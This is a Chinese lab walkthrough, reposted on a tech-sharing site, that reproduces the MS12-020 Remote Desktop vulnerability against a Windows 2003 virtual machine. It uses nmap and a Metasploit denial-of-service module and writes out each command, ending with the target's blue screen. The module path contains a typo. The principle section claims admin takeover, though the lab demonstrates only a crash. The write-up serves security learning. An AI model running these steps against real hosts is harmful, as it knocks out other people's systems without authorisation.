标签：ms12 -- 3389 MS12 020 蓝屏 靶机 远程桌面

一、原理

        ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向远程桌面默认端口（3389）发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统。
  根据实际被入侵终端进行分析，开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

二、实验环境

 

攻击机：kali
靶机win2003 ip：192. 168.252.136

两者都在同一内网，采用NAT连接方式

 

三、漏洞复现

1、开启win2003的远程桌面：控制面板-->系统-->远程-->远程协助-->远程桌面

 

2、控制面板-->windows防火墙-->例外-->远程桌面

 3、用nmap扫描靶机，发现靶机的3389端口已经打开

输入：nmap 192.168.252.136

 

 4、在kali的终端中打开msfconsole

 

5、使用search功能搜索ms12-020，发现有两个可用模块。

输入：search ms12-020

 

6、使用第一个可用版模块

输入：use auxiliary/dos/windows/rdp/ma12_020_maxchannelids

 

7、利用set命令设置攻击的IP。

输入：set rhosts 192.168.252.136

          show options

8、输入：exploit，执行攻击

 

9、看一下靶机，发现靶机蓝屏了

 

 

 

 

 

 

 

 

标签：ms12,--,3389,MS12,020,蓝屏,靶机,远程桌面
来源： https://www.cnblogs.com/mo-molu/p/15700644.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。